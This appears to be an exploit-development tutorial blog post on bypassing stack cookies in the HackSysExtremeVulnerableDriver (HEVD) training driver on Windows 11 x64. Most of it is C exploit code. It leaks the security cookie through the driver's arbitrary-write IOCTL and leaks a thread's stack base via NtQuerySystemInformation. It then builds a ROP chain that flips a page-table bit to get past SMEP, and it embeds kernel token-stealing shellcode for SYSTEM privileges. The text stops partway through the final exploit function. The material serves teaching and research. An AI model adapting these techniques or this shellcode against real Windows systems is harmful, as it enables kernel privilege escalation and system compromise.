In the last tutorial we exploited one of the most notorious bug classes in the entire industry - Race Conditions.

In this tutorial we’re going back to a bug class we have exploited before - The Stack Overflow. However, this time we’ll be encountering an exploit mitigation known as stack cookies or canaries. That said, we’ll be skipping Windows 7 (x86) and jumping directly into Windows 11 (x64).

It’s important to note that the core issue in relation to the security vulnerability HAS NOT changed we’ll still be exploiting a Stack Overflow.

Let’s jump into a high-level overview :)

Table of Contents
#

What are Stack Cookies (High Level)
Reverse Engineering
- Crafting a PoC
- Mitigation Analysis
Baking Cookies
Exploitation
Sources

What are Stack Cookies (High Level)
#

Cookies are likely one of your favorite sugary snacks, however in the context of Cyber Security this is normally a term used by exploit developers in regard to a security mitigation designed to prevent buffer overflows (also known as stack overflows). Before diving into any technical details this is best understood with a high-level overview.

Imagine you have just gone to a family outing and brought chocolate chip cookies from the store for others to eat. These cookies are from REDACTED so everyone is excited to dig in!

However, your aunt makes it clear: “everyone must eat dinner before dessert”. Little do you know your aunt is jealous. Your cookies have become the star of the show! Since you’ve let her know hours prior to arriving you would be bringing these cookies, she cooked a batch indistinguishable from REDACTED’s cookies.

However, she’s added one extra ingredient…

With everyone distracted eating dinner, your aunt swaps the cookies you brought for her own. It looks like her carne asada will once again be the star of the cookout.

Once everyone finished their meals, they went in for some delicious chocolate chip cookies. However, it looks like your aunt’s plan failed since everyone immediately tastes the raisins and REDACTED does not make raisin cookies!

How does this relate to exploit mitigations?

In this scenario you and your family would be the stack / operating system (OS) and the cookies would be the stack cookies (or canary).
Your aunt would be the attacker.
The cookie swap could be looked at as the stack overflow
Since these cookies are unique (chocolate chip) you and your family would be easily able to identify these are not from REDACTED.

In a very similar fashion this is what the exploit mitigation does.

You see, when you exploit a stack overflow you are corrupting memory this includes variables, structures, etc. With this mitigation a “cookie” or value is added onto the stack.

The way programs work is that when an application returns from a function call and execution is directed to a return address the application will perform a check to ensure the cookie (value) has not been corrupted (assuming the mitigation is enabled). Should the application or OS detect modification of this value often the operating system or application will crash - however, not in a way that benefits an attacker.

If we cannot find a way to avoid this from happening (e.g using a leak), we will more than likely not be able to exploit this vulnerability.

Of course, there are many ways to bypass any mitigation and today we will be doing just that!

In fact, you may already be thinking “what if our aunt used chocolate chips and not raisins”?

Reverse Engineering
#

As with previous vulnerabilities we’ll need to gather information prior to starting exploitation: the IOCTL code (0x222007) and the vulnerable function. This is pretty easy to spot since HEVD comes with symbols and functions conveniently named so we can learn more about these bug classes.

Based on the decompilation shown above we won’t be dealing with any custom structures, meaning we can proceed to take a look at the TriggerBufferOverflowStackGS function.

Looking at the above de-compilation, we can see that the cookie gets stored in the pseudo variable local_38, then we call __security_check_cookie() when exiting the function. As for the core vulnerability - we know this is a vanilla buffer overflow based on the memcpy() copying any buffer into pseudo code array variable local_238[]. Let’s go ahead and craft a proof of concept to see what happens when we trigger this vulnerability.

Crafting a PoC
#

Since we’re dealing with a vanilla stack overflow there’s no need to really overcomplicate this. Let’s dish out a PoC!

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>

#include <windows.h>
#include <psapi.h>
#include <ntdef.h>
#include <winternl.h>
#include <shlwapi.h>

/* IOCTL */
#define STACK_OVERFLOW_GS_IOCTL 0x222007

/* Exploit Settings */
#define ALLOCATION_SIZE 0x1000

/* GetKernelModuleBase():
     Function used to obtain kernel module address */
LPVOID GetKernelModuleBase(PCHAR pKernelModule)
{
  char pcDriver[1024]    = { 0 };
  LPVOID lpvTargetDriver = NULL;
  LPVOID *lpvDrivers     = NULL;
  DWORD dwCB             = 0;
  DWORD dwDrivers        = 0;
  DWORD i                = 0;

  EnumDeviceDrivers(NULL, dwCB, &dwCB);
  if (dwCB <= 0)
    return NULL;

  lpvDrivers = (LPVOID *)malloc(dwCB * sizeof(LPVOID));
  if (lpvDrivers == NULL)
    return NULL;

  if (EnumDeviceDrivers(lpvDrivers, dwCB, &dwCB))
  {
    dwDrivers = dwCB / sizeof(LPVOID);
    for (i = 0; i < dwDrivers; i++)
      if (GetDeviceDriverBaseNameA(lpvDrivers[i], pcDriver, sizeof(pcDriver)))
        if (StrStrA(pcDriver, pKernelModule) != NULL)
          lpvTargetDriver = lpvDrivers[i];
  }

  free(lpvDrivers);

  return lpvTargetDriver;
}

/* CheckWin():
     Simple function to check if we're running as SYSTEM */
int CheckWin(VOID)
{
  DWORD win = 0;
  DWORD dwLen = 0;
  CHAR *cUsername = NULL;

  GetUserNameA(NULL, &dwLen);

  if (dwLen > 0) {
    cUsername = (CHAR *)malloc(dwLen * sizeof(CHAR));
  } else {
    printf("[-] Failed to allocate buffer for username check\n");
    return -1;
  }

  GetUserNameA(cUsername, &dwLen);

  win = strcmp(cUsername, "SYSTEM");
  free(cUsername);

  return (win == 0) ? win : -1;
}


/* GenerateExploitBuffer():
     Generate the buffer that will overwrite the return address and grant control over the instruction pointer. */
DWORD GenerateExploitBuffer(LPVOID lpvNt, LPVOID lpvBuffer)
{
  size_t i = 0;
  uint64_t *payload = (uint64_t *)lpvBuffer;

  for (i = 0; i < ALLOCATION_SIZE; i += sizeof(uint64_t))
    *payload++ = 0x41414141;

  return i;
}

/* Exploit():
     Stack Overflow (GS) */
int Exploit(HANDLE hHEVD)
{
  DWORD dwExploitBuffer = 0;
  DWORD dwBytesReturned = 0;
  LPVOID lpvMemoryAlloc = NULL;

  lpvMemoryAlloc = VirtualAlloc(NULL,
                                ALLOCATION_SIZE,
                                (MEM_COMMIT | MEM_RESERVE),
                                PAGE_EXECUTE_READWRITE);
  if (lpvMemoryAlloc == NULL)
  {
    printf("[*] Failed to create exploitation buffer\n");
    return -1;
  }

  dwExploitBuffer = GenerateExploitBuffer(NULL, lpvMemoryAlloc);
  printf("[*] Exploit buffer size: %d\n", dwExploitBuffer);

  DeviceIoControl(hHEVD,
                  STACK_OVERFLOW_GS_IOCTL,
                  lpvMemoryAlloc,
                  dwExploitBuffer,
                  NULL,
                  0x00,
                  &dwBytesReturned,
                  NULL);

  return CheckWin();
}

int main()
{
  HANDLE hHEVD = NULL;
  hHEVD = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver",
                      (GENERIC_READ | GENERIC_WRITE),
                      0x00,
                      NULL,
                      OPEN_EXISTING,
                      FILE_ATTRIBUTE_NORMAL,
                      NULL);

  if (hHEVD == NULL)
  {
    printf("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n");
    return -1;
  }

  if (Exploit(hHEVD) == 0) {
    printf("[*] Exploitation success!!! Enjoy de shell!!\n\n");
    system("cmd.exe");
  } else {
    printf("[-] Exploitation failed, run again\n");
  }

  if (hHEVD != INVALID_HANDLE_VALUE) {
    CloseHandle(hHEVD);
  }
}

Once sent, we get a crash :)

However, taking a closer look at the crash, we can see we have encountered the stack cookie / canary mitigation.

Mitigation Analysis
#

Looking at the cookie initialization we can see that the __security_cookie is stored within HEVD at HEVD+0x3000 (we can also confirm this in Ghidra). In addition, we can see that the __security_cookie will be XOR’d by the value currently stored in RSP. Once complete, the result of the XOR operation is stored into RSP+0x220 essentially an offset into the stack. Without looking at this further we can make the assumption that if we overwrite the value stored at RSP+0x220 we’ll trigger the mitigation.

If we re-launch the exploit and break at the start of TriggerBufferOverflowStackGS, we can confirm the cookie is stored in HEVD’s memory:

We further confirm this when we get to the XOR operation. Which as shown below, we can see is simply the current stack address NOT a hardcoded value of some sort.

If we step once more, we can see this new value stored in RAX will be placed onto the stack. What if we restored this once corrupted?

You may have issues during analysis with such a large buffer, so go ahead and decrease the buffer size to 0x900 bytes. Once done, re-run the experiment above and run !analyze -v. This time our final cookie after the XOR operation is ffff40da07033567 and RSP+0x220 pointed to ffffe58347db76f0, with that we can set a breakpoint at HEVD+0x867b9. At this point if we continue execution we can see we take a jump, if we continued (we won’t) we’d end up calling the __security_check_cookie() function. If we dump the address where the cookie was stored we can see we have corrupted it. However if we restore it and continue…

We get control over the instruction pointer :)

This gives us a solid high-level overview on how we can bypass this mitigation.

Baking Cookies
#

So as with other exploits we’ve written throughout this HEVD “course” you may be thinking this would be as simple as getting the base address of HEVD and reading the memory location where the cookie was located. However, quickly (stubbornly) we’d learn this was not the case. We need to find a leak, in our case we could re-use the Write-What-Where / Arbitrary Write vulnerability…

Let’s write a PoC and test it.

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>

#include <windows.h>
#include <psapi.h>
#include <ntdef.h>
#include <winternl.h>
#include <shlwapi.h>

/* IOCTL */
#define STACK_OVERFLOW_GS_IOCTL 0x222007
#define ARBITRARY_WRITE_IOCTL 0x22200b

/* Structure used by Write-What-Where */
typedef struct _WRITE_WHAT_WHERE
{
  uint64_t *ullpWhat;
  uint64_t *ullpWhere;
} WRITE_WHAT_WHERE, *PWRITE_WHAT_WHERE;

/* Exploit Settings */
#define ALLOCATION_SIZE 0x900

/* GetKernelModuleBase():
     Function used to obtain kernel module address */
LPVOID GetKernelModuleBase(PCHAR pKernelModule)
{
  char pcDriver[1024]    = { 0 };
  LPVOID lpvTargetDriver = NULL;
  LPVOID *lpvDrivers     = NULL;
  DWORD dwCB             = 0;
  DWORD dwDrivers        = 0;
  DWORD i                = 0;

  EnumDeviceDrivers(NULL, dwCB, &dwCB);
  if (dwCB <= 0)
    return NULL;

  lpvDrivers = (LPVOID *)malloc(dwCB * sizeof(LPVOID));
  if (lpvDrivers == NULL)
    return NULL;

  if (EnumDeviceDrivers(lpvDrivers, dwCB, &dwCB))
  {
    dwDrivers = dwCB / sizeof(LPVOID);
    for (i = 0; i < dwDrivers; i++)
      if (GetDeviceDriverBaseNameA(lpvDrivers[i], pcDriver, sizeof(pcDriver)))
        if (StrStrA(pcDriver, pKernelModule) != NULL)
          lpvTargetDriver = lpvDrivers[i];
  }

  free(lpvDrivers);

  return lpvTargetDriver;
}

/* CheckWin():
     Simple function to check if we're running as SYSTEM */
int CheckWin(VOID)
{
  DWORD win = 0;
  DWORD dwLen = 0;
  CHAR *cUsername = NULL;

  GetUserNameA(NULL, &dwLen);

  if (dwLen > 0) {
    cUsername = (CHAR *)malloc(dwLen * sizeof(CHAR));
  } else {
    printf("[-] Failed to allocate buffer for username check\n");
    return -1;
  }

  GetUserNameA(cUsername, &dwLen);

  win = strcmp(cUsername, "SYSTEM");
  free(cUsername);

  return (win == 0) ? win : -1;
}


/* GenerateExploitBuffer():
     Generate the buffer that will overwrite the return address and grant control over the instruction pointer. */
DWORD GenerateExploitBuffer(LPVOID lpvNt, LPVOID lpvBuffer)
{
  size_t i = 0;
  uint64_t *payload = (uint64_t *)lpvBuffer;

  for (i = 0; i < ALLOCATION_SIZE; i += sizeof(uint64_t))
    *payload++ = 0x41414141;

  return i;
}

/* WriteBytes():
     Arbitrary write located in the TriggerArbitraryWrite() function */
void WriteBytes(HANDLE hHEVD, uint64_t* u64What, uint64_t* u64Where)
{
  DWORD dwBytesReturned = 0;
  WRITE_WHAT_WHERE www = { 0 };

  www.ullpWhere = u64Where;
  www.ullpWhat = u64What;

  printf("\t[*] Writing 0x%p to 0x%p\n", www.ullpWhat, www.ullpWhere);

  DeviceIoControl(hHEVD,
                  ARBITRARY_WRITE_IOCTL,
                  &www,
                  sizeof(WRITE_WHAT_WHERE),
                  NULL,
                  0x00,
                  &dwBytesReturned,
                  NULL);
}

/* LeakCookie():
     Leverage the ARBITRARY_WRITE_IOCTL to write to our variable in Userland from
     Kernel Land. */
uint64_t LeakCookie(HANDLE hHEVD, LPVOID lpvHEVD)
{
  uint64_t cookie = 0;
  uint64_t *pu64Cookie = (uint64_t *)(lpvHEVD + 0x3000);

  printf("\t[*] Cookie located @{0x%p}\n", pu64Cookie);
  WriteBytes(hHEVD, pu64Cookie, &cookie);

  printf("\t[+] Cookie leaked: 0x%p\n", cookie);

  return cookie;
}

/* Exploit():
     Stack Overflow (GS) */
int Exploit(HANDLE hHEVD)
{
  uint64_t cookie = 0x00;
  
  DWORD dwExploitBuffer = 0;
  DWORD dwBytesReturned = 0;
  
  LPVOID lpvMemoryAlloc = NULL;
  LPVOID lpvHEVD = GetKernelModuleBase("HEVD");

  if (lpvHEVD == NULL) {
    printf("[-] Failed to obtain the base address of HEVD\n");
    return -1;
  }
  printf("[*] Base address of HEVD @{0x%p}\n", lpvHEVD);

  printf("[*] Attempting to leak __security_cookie\n");
  cookie = LeakCookie(hHEVD, lpvHEVD);

---snip---
}

Once launched, we successfully leaked the stack cookie!

However, we still need to leak the stack… I was pretty stuck… until I came across another great post by Kristal-G where the use of a leak from sam-b came in handy.

Let’s once again code this and test it!

void LeakStack(wchar_t *targetPoC)
{
  HMODULE ntdll = GetModuleHandle(TEXT("ntdll"));
  PNtQuerySystemInformation query = (PNtQuerySystemInformation)GetProcAddress(ntdll, "NtQuerySystemInformation");
  if (query == NULL) {
    printf("GetProcAddress() failed.\n");
    exit(-1);
  }

  ULONG len = 2000;
  NTSTATUS status = 0x00;
  PSYSTEM_EXTENDED_PROCESS_INFORMATION pProcessInfo = NULL;
  do {
    len *= 2;
    pProcessInfo = (PSYSTEM_EXTENDED_PROCESS_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);
    status = query(SystemExtendedProcessInformation, pProcessInfo, len, &len);
  } while (status == (NTSTATUS)0xc0000004);
  
  if (status != (NTSTATUS)0x0) {
    printf("NtQuerySystemInformation failed with error code 0x%X\n", status);
    exit(-1);
  }

  while (pProcessInfo->NextEntryOffset != 0x00) {
    // Strangely I was able to do this with the pProcessInfo->ImageName.Buffer being NULL? 
    if (StrStrW(pProcessInfo->ImageName.Buffer, targetPoC) != NULL || pProcessInfo->ImageName.Buffer == NULL) {
      printf("[*] Leaking stack from %ls\n", targetPoC);
      for (unsigned int i = 0; i < pProcessInfo->NumberOfThreads; i++) {
        LPVOID stackBase = pProcessInfo->Threads[i].StackBase;
        LPVOID stackLimit = pProcessInfo->Threads[i].StackLimit;
#ifdef _WIN64
        printf("\tStack base 0x%p\tStack limit 0x%p\n", stackBase, stackLimit);
#else
        printf("\tStack base 0x%X\t", stackBase);
        printf("\tStack limit 0x%X\r\n", stackLimit);
#endif
        break;
      }
    }

    if (!pProcessInfo->NextEntryOffset) {
      pProcessInfo = NULL;
    } else {
      pProcessInfo = (PSYSTEM_EXTENDED_PROCESS_INFORMATION)((ULONG_PTR)pProcessInfo + pProcessInfo->NextEntryOffset);
    }
  }
}

/* Exploit():
     Stack Overflow (GS) */
int Exploit(HANDLE hHEVD)
{
  uint64_t cookie = 0x00;
  
  DWORD dwExploitBuffer = 0;
  DWORD dwBytesReturned = 0;

  LPVOID lpvStackLeak = NULL;
  LPVOID lpvMemoryAlloc = NULL;
  LPVOID lpvHEVD = GetKernelModuleBase("HEVD");

  if (lpvHEVD == NULL) {
    printf("[-] Failed to obtain the base address of HEVD\n");
    return -1;
  }
  printf("[*] Base address of HEVD @{0x%p}\n", lpvHEVD);

  printf("[*] Attempting to leak __security_cookie\n");
  cookie = LeakCookie(hHEVD, lpvHEVD);

  LeakStack(L"poc.exe");
  getchar();
---snip---
}

As you can see from our source code, we had a lot of trouble getting the target process. It was strange, basically what we ended up seeing was that the pProcessInfor->ImageName.Buffer needed to be NULL.

We can further confirm this with GDB.

With that we should have everything we need to exploit this bug :)

Exploitation
#

Below is the final PoC code:

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <wchar.h>

#include <windows.h>
#include <psapi.h>
#include <shlwapi.h>

typedef LONG KPRIORITY;

typedef struct _CLIENT_ID {
  DWORD          UniqueProcess;
  DWORD          UniqueThread;
} CLIENT_ID;

typedef struct _UNICODE_STRING {
  USHORT Length;
  USHORT MaximumLength;
#ifdef MIDL_PASS
  [size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT * Buffer;
#else // MIDL_PASS
  _Field_size_bytes_part_opt_(MaximumLength, Length) PWCH   Buffer;
#endif // MIDL_PASS
} UNICODE_STRING;
typedef UNICODE_STRING *PUNICODE_STRING;
typedef const UNICODE_STRING *PCUNICODE_STRING;

//from http://boinc.berkeley.edu/android-boinc/boinc/lib/diagnostics_win.h
typedef struct _VM_COUNTERS {
  // the following was inferred by painful reverse engineering
  SIZE_T                   PeakVirtualSize;     // not actually
  SIZE_T         PageFaultCount;
  SIZE_T         PeakWorkingSetSize;
  SIZE_T         WorkingSetSize;
  SIZE_T         QuotaPeakPagedPoolUsage;
  SIZE_T         QuotaPagedPoolUsage;
  SIZE_T         QuotaPeakNonPagedPoolUsage;
  SIZE_T         QuotaNonPagedPoolUsage;
  SIZE_T         PagefileUsage;
  SIZE_T         PeakPagefileUsage;
  SIZE_T         VirtualSize;           // not actually
} VM_COUNTERS;

typedef enum _KWAIT_REASON
{
  Executive = 0,
  FreePage = 1,
  PageIn = 2,
  PoolAllocation = 3,
  DelayExecution = 4,
  Suspended = 5,
  UserRequest = 6,
  WrExecutive = 7,
  WrFreePage = 8,
  WrPageIn = 9,
  WrPoolAllocation = 10,
  WrDelayExecution = 11,
  WrSuspended = 12,
  WrUserRequest = 13,
  WrEventPair = 14,
  WrQueue = 15,
  WrLpcReceive = 16,
  WrLpcReply = 17,
  WrVirtualMemory = 18,
  WrPageOut = 19,
  WrRendezvous = 20,
  Spare2 = 21,
  Spare3 = 22,
  Spare4 = 23,
  Spare5 = 24,
  WrCalloutStack = 25,
  WrKernel = 26,
  WrResource = 27,
  WrPushLock = 28,
  WrMutex = 29,
  WrQuantumEnd = 30,
  WrDispatchInt = 31,
  WrPreempted = 32,
  WrYieldExecution = 33,
  WrFastMutex = 34,
  WrGuardedMutex = 35,
  WrRundown = 36,
  MaximumWaitReason = 37
} KWAIT_REASON;

typedef struct _SYSTEM_THREAD_INFORMATION {
  LARGE_INTEGER KernelTime;
  LARGE_INTEGER UserTime;
  LARGE_INTEGER CreateTime;
  ULONG WaitTime;
  PVOID StartAddress;
  CLIENT_ID ClientId;
  KPRIORITY Priority;
  LONG BasePriority;
  ULONG ContextSwitchCount;
  ULONG ThreadState;
  KWAIT_REASON WaitReason;
#ifdef _WIN64
  ULONG Reserved[4];
#endif
} SYSTEM_THREAD_INFORMATION, *PSYSTEM_THREAD_INFORMATION;

typedef struct _SYSTEM_EXTENDED_THREAD_INFORMATION
{
  SYSTEM_THREAD_INFORMATION ThreadInfo;
  PVOID StackBase;
  PVOID StackLimit;
  PVOID Win32StartAddress;
  PVOID TebAddress; /* This is only filled in on Vista and above */
  ULONG Reserved1;
  ULONG Reserved2;
  ULONG Reserved3;
} SYSTEM_EXTENDED_THREAD_INFORMATION, *PSYSTEM_EXTENDED_THREAD_INFORMATION;

typedef struct _SYSTEM_EXTENDED_PROCESS_INFORMATION
{
  ULONG NextEntryOffset;
  ULONG NumberOfThreads;
  LARGE_INTEGER SpareLi1;
  LARGE_INTEGER SpareLi2;
  LARGE_INTEGER SpareLi3;
  LARGE_INTEGER CreateTime;
  LARGE_INTEGER UserTime;
  LARGE_INTEGER KernelTime;
  UNICODE_STRING ImageName;
  KPRIORITY BasePriority;
  ULONG ProcessId;
  ULONG InheritedFromUniqueProcessId;
  ULONG HandleCount;
  ULONG SessionId;
  PVOID PageDirectoryBase;
  VM_COUNTERS VirtualMemoryCounters;
  SIZE_T PrivatePageCount;
  IO_COUNTERS IoCounters;
  SYSTEM_EXTENDED_THREAD_INFORMATION Threads[1];
} SYSTEM_EXTENDED_PROCESS_INFORMATION, *PSYSTEM_EXTENDED_PROCESS_INFORMATION;

typedef enum _SYSTEM_INFORMATION_CLASS {
  SystemExtendedProcessInformation = 57
} SYSTEM_INFORMATION_CLASS;

typedef NTSTATUS(WINAPI *PNtQuerySystemInformation)(
  __in SYSTEM_INFORMATION_CLASS SystemInformationClass,
  __inout PVOID SystemInformation,
  __in ULONG SystemInformationLength,
  __out_opt PULONG ReturnLength
);

/* IOCTL */
#define STACK_OVERFLOW_GS_IOCTL 0x222007
#define ARBITRARY_WRITE_IOCTL 0x22200b

/* Structure used by Write-What-Where */
typedef struct _WRITE_WHAT_WHERE
{
  uint64_t *ullpWhat;
  uint64_t *ullpWhere;
} WRITE_WHAT_WHERE, *PWRITE_WHAT_WHERE;

/* Exploit Settings */
#define ALLOCATION_SIZE 0x900

/* GetKernelModuleBase():
     Function used to obtain kernel module address */
LPVOID GetKernelModuleBase(PCHAR pKernelModule)
{
  char pcDriver[1024]    = { 0 };
  LPVOID lpvTargetDriver = NULL;
  LPVOID *lpvDrivers     = NULL;
  DWORD dwCB             = 0;
  DWORD dwDrivers        = 0;
  DWORD i                = 0;

  EnumDeviceDrivers(NULL, dwCB, &dwCB);
  if (dwCB <= 0)
    return NULL;

  lpvDrivers = (LPVOID *)malloc(dwCB * sizeof(LPVOID));
  if (lpvDrivers == NULL)
    return NULL;

  if (EnumDeviceDrivers(lpvDrivers, dwCB, &dwCB))
  {
    dwDrivers = dwCB / sizeof(LPVOID);
    for (i = 0; i < dwDrivers; i++)
      if (GetDeviceDriverBaseNameA(lpvDrivers[i], pcDriver, sizeof(pcDriver)))
        if (StrStrA(pcDriver, pKernelModule) != NULL)
          lpvTargetDriver = lpvDrivers[i];
  }

  free(lpvDrivers);

  return lpvTargetDriver;
}

/* CheckWin():
     Simple function to check if we're running as SYSTEM */
int CheckWin(VOID)
{
  DWORD win = 0;
  DWORD dwLen = 0;
  CHAR *cUsername = NULL;

  GetUserNameA(NULL, &dwLen);

  if (dwLen > 0) {
    cUsername = (CHAR *)malloc(dwLen * sizeof(CHAR));
  } else {
    printf("[-] Failed to allocate buffer for username check\n");
    return -1;
  }

  GetUserNameA(cUsername, &dwLen);

  win = strcmp(cUsername, "SYSTEM");
  free(cUsername);

  return (win == 0) ? win : -1;
}

/* GenerateExploitBuffer():
     Generate the buffer that will overwrite the return address and grant control over the instruction pointer. */
DWORD GenerateExploitBuffer(LPVOID lpvNt, LPVOID lpvStackLeak, uint64_t cookie, LPVOID lpvBuffer)
{
  size_t j = 0;
  size_t i = 0;
  LPVOID shellcode = NULL;
  uint64_t nt = (uint64_t)(lpvNt);
  uint64_t stack = (uint64_t)(lpvStackLeak);
  uint64_t *payload = (uint64_t *)(lpvBuffer);

  uint8_t sc[129] = {
  // sickle-tool -p windows/x64/kernel_token_stealer -f num (58 bytes)
  0x65, 0x48, 0xa1, 0x88, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 
  0xb8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xb2, 0x04, 0x48, 0x8b, 0x80, 0x48, 0x04, 
  0x00, 0x00, 0x48, 0x2d, 0x48, 0x04, 0x00, 0x00, 0x38, 0x90, 0x40, 0x04, 0x00, 0x00, 
  0x75, 0xeb, 0x48, 0x8b, 0x90, 0xb8, 0x04, 0x00, 0x00, 0x48, 0x89, 0x91, 0xb8, 0x04, 
  0x00, 0x00,
 
  // sickle-tool -p windows/x64/kernel_sysret -f num (71)
  0x65, 0x48, 0xa1, 0x88, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x66, 0x8b, 0x88, 
  0xe4, 0x01, 0x00, 0x00, 0x66, 0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 
  0x48, 0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68, 0x01, 0x00, 0x00, 
  0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 
  0x48, 0x8b, 0xaa, 0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48, 0x0f, 
  0x07 };

  shellcode = VirtualAlloc(NULL, sizeof(sc), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  if (shellcode == NULL)
  {
    printf("[-] Failed to allocate memory for shellcode\n");
    return -1;
  }
  RtlCopyMemory(shellcode, sc, 129);

  /* Adjust the stack pointer */
  stack -= 0xb30;
  printf("\t[*] Writing stack cookie @{0x%p}\n", stack);

  /* Overflow past the size of the buffer */
  for (i = 0; i < (512 / sizeof(uint64_t)); i++)
  {
    payload[i] = 0x4141414141414141;
  }

  payload[i++] = (stack ^ cookie); /* Stack Cookie */

  /* Offset to shellcode start */
  payload[i++] = 0x4343434343434343;
  payload[i++] = 0x4444444444444444;
  payload[i++] = 0x4545454545454545;
  payload[i++] = 0x4646464646464646;
  payload[i++] = 0x4747474747474747;
  payload[i++] = 0x4848484848484848;

  /* Prepare RDX register for later. This is needed for the XOR operation */
  payload[i++] = nt + 0x40ed4e; // pop rdx ; pop rax ; pop rcx ; ret
  payload[i++] =      0x000008; // Set RDX to 0x08, we will need this to accomplish the XOR
  payload[i++] =      0x000000; // [filler]
  payload[i++] =      0x000000; // [filler]

  /* Setup the call to MiGetPteAddress in order to get the address of the PTE for our
     userland code. The setup is as follows:

       RAX -> VOID *MiGetPteAddress(
         ( RCX == PTE / Userland Code )
       );

     Once the call is complete RAX should contain the pointer to our PTE. */
  payload[i++] = nt + 0x57699c;       // pop rcx ; ret
  payload[i++] = (uint64_t)shellcode; // *shellcode
  payload[i++] = nt + 0x24aaec;       // MiGetPteAddress()

  /* Now that we have obtained the PTE address, we can modify the 2nd bit in order to
       mark the page as a kernel page (U -> K). We can do this using XOR ;) */
  payload[i++] = nt + 0x30fcf3; // sub rax, rdx ; ret
  payload[i++] = nt + 0x54f344; // push rax ; pop rbx ; ret
  payload[i++] = nt + 0x40ed4e; // pop rdx ; pop rax ; pop rcx ; ret
  payload[i++] =      0x000004; // 0x40ed4e: pop rdx ; pop rax ; pop rcx ; ret ; (1 found)
  payload[i++] =      0x000000; // [filler]
  payload[i++] =      0x000000; // [filler]
  payload[i++] = nt + 0x3788b6; // xor  [rbx+0x08], edx ; mov rbx, qword [rsp+0x60] ; add rsp, 0x40 ; pop r14 ; pop rdi ; pop rbp ; ret

  /* Now we cam spray our shellcode address since SMEP and VPS should be bypassed */
  for (j = 0; j < 0xC; j++) {
    payload[i++] = (uint64_t)shellcode;
  }

  printf("\t[*] Generated %d bytes ...\n", (i * sizeof(uint64_t)));

  return (i * sizeof(uint64_t));
}

/* WriteBytes():
     Arbitrary write located in the TriggerArbitraryWrite() function */
void WriteBytes(HANDLE hHEVD, uint64_t* u64What, uint64_t* u64Where)
{
  DWORD dwBytesReturned = 0;
  WRITE_WHAT_WHERE www = { 0 };

  www.ullpWhere = u64Where;
  www.ullpWhat = u64What;

  printf("\t[*] Writing 0x%p to 0x%p\n", www.ullpWhat, www.ullpWhere);

  DeviceIoControl(hHEVD,
                  ARBITRARY_WRITE_IOCTL,
                  &www,
                  sizeof(WRITE_WHAT_WHERE),
                  NULL,
                  0x00,
                  &dwBytesReturned,
                  NULL);
}

/* LeakCookie():
     Leverage the ARBITRARY_WRITE_IOCTL to write to our variable in Userland from
     Kernel Land. */
uint64_t LeakCookie(HANDLE hHEVD, LPVOID lpvHEVD)
{
  uint64_t cookie = 0;
  uint64_t *pu64Cookie = (uint64_t *)(lpvHEVD + 0x3000);

  printf("\t[*] Cookie located @{0x%p}\n", pu64Cookie);
  WriteBytes(hHEVD, pu64Cookie, &cookie);

  printf("\t[+] Cookie leaked: 0x%p\n", cookie);

  return cookie;
}

void LeakStack(wchar_t *targetPoC, LPVOID *lpvStackLeak)
{
  HMODULE ntdll = GetModuleHandle(TEXT("ntdll"));
  PNtQuerySystemInformation query = (PNtQuerySystemInformation)GetProcAddress(ntdll, "NtQuerySystemInformation");
  if (query == NULL) {
    printf("GetProcAddress() failed.\n");
    exit(-1);
  }

  ULONG len = 2000;
  NTSTATUS status = 0x00;
  PSYSTEM_EXTENDED_PROCESS_INFORMATION pProcessInfo = NULL;
  do {
    len *= 2;
    pProcessInfo = (PSYSTEM_EXTENDED_PROCESS_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);
    status = query(SystemExtendedProcessInformation, pProcessInfo, len, &len);
  } while (status == (NTSTATUS)0xc0000004);
  
  if (status != (NTSTATUS)0x0) {
    printf("NtQuerySystemInformation failed with error code 0x%X\n", status);
    exit(-1);
  }

  LPVOID stackBase = NULL;
  LPVOID stackLimit = NULL;
  while (pProcessInfo->NextEntryOffset != 0x00) {
    // Strangely I was able to do this with the pProcessInfo->ImageName.Buffer being NULL? 
    if (StrStrW(pProcessInfo->ImageName.Buffer, targetPoC) != NULL) {
      printf("[*] Leaking stack from %ls\n", targetPoC);
      for (unsigned int i = 0; i < pProcessInfo->NumberOfThreads; i++) {
        stackBase = pProcessInfo->Threads[i].StackBase;
        stackLimit = pProcessInfo->Threads[i].StackLimit;
#ifdef _WIN64
        printf("\t[*] Stack base 0x%p\tStack limit 0x%p\n", stackBase, stackLimit);
#else
        printf("\t[*] Stack base 0x%X\tStack limit 0x%X\n", stackBase, stackLimit);
#endif
        break;
      }
    }

    if (!pProcessInfo->NextEntryOffset) {
      pProcessInfo = NULL;
    } else {
      pProcessInfo = (PSYSTEM_EXTENDED_PROCESS_INFORMATION)((ULONG_PTR)pProcessInfo + pProcessInfo->NextEntryOffset);
    }
  }

  *lpvStackLeak = stackBase;
}

/* Exploit():
     Stack Overflow (GS) */
int Exploit(HANDLE hHEVD)
{
  uint64_t cookie = 0x00;
  
  DWORD dwExploitBuffer = 0;
  DWORD dwBytesReturned = 0;

  LPVOID lpvStackLeak = NULL;
  LPVOID lpvMemoryAlloc = NULL;
  LPVOID lpvHEVD = GetKernelModuleBase("HEVD");
  LPVOID lpvNtKrnl = GetKernelModuleBase("ntoskrnl");

  if (lpvHEVD == NULL)
  {
    printf("[-] Failed to obtain the base address of HEVD\n");
    return -1;
  }

  if (lpvNtKrnl == NULL)
  {
    printf("[-] Failed to obtain the base address of ntoskrnl\n");
    return -1;
  }

  printf("[*] Exploitation started....\n");
